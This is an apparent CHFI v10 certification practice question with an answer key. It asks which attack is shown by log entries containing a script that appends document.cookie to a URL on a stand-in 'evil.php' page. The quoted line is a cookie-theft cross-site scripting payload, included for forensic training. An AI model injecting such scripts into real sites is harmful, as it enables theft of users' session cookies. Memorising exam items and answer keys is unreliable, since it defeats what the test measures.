Computer Hacking Forensic Investigator (CHFI v10) — Question 280

You are the incident response manager at a regional bank. While performing routine auditing of web application logs, you find several attempted login submissions that contain the following strings:
< SCRIPT type="text/javascript" >
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
< /SCRIPT >
What kind of attack has occurred?

Answer options

• A. Cross-site scripting
• B. Cross-site request forgery
• C. Buffer overflow
• D. SQL injection

Correct answer: A

Explanation

The attack described is indicative of Cross-site scripting (XSS), where malicious scripts are injected into web pages viewed by users. The code attempts to access and send the user's cookies to an external site, which is a typical behavior of XSS attacks. The other options, such as Cross-site request forgery, Buffer overflow, and SQL injection, involve different techniques and do not relate to the injection of scripts into web pages.